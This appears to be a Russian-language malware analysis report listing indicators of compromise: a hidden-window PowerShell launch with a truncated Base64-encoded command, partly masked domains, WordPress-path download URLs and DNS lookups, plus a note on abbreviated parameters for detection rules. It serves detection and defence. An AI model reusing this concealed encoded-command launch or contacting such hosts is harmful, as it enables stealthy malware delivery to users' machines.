Техническая информация
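- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABEAGwAdQB4AG4AegB2AGYAbABrAD0AJwBLAHQAdwBqAG0AZQBqAHgAZwAnADsAJABIAHkAaABvAHcAeQBqAHAAbABzAG0AcwAgAD0AIAAnADUANwAnADsAJABCAGwAbABhAGIAbwByAGYAPQAnAEYAYwBlAGc...
  (Примечание: `-w hidden` — сокращение от `-WindowStyle Hidden`, `-enco` — от `-EncodedCommand`; PowerShell принимает любые однозначные префиксы имён параметров, поэтому правила обнаружения должны учитывать и сокращённые формы. Аргумент — Base64 от текста в UTF-16LE; видимая часть декодируется в `$Dluxnzvflk='Ktwjmejxg';$Hyhowyjplsms = '57';$Bllaborf='Fceg…` — присваивания переменным со случайными именами. Строка в отчёте обрезана, остальная часть команды здесь не показана.)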
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\1117840.cvr
- 'vi##-bd.com':80
- 'kw######niastokrotka.com':80
- 'kw######niastokrotka.com':443
- http://vi##-bd.com/jet1/gbtvinh/
- http://kw######niastokrotka.com/wp-content/vb1v/
- http://www.kw######niastokrotka.com/wp-content/vb1v/
- 'kw######niastokrotka.com':443
- DNS ASK vi##-bd.com
- DNS ASK sz####ia.budniq.com
- DNS ASK ua###say.com
- DNS ASK ju###ituan.com
- DNS ASK kw######niastokrotka.com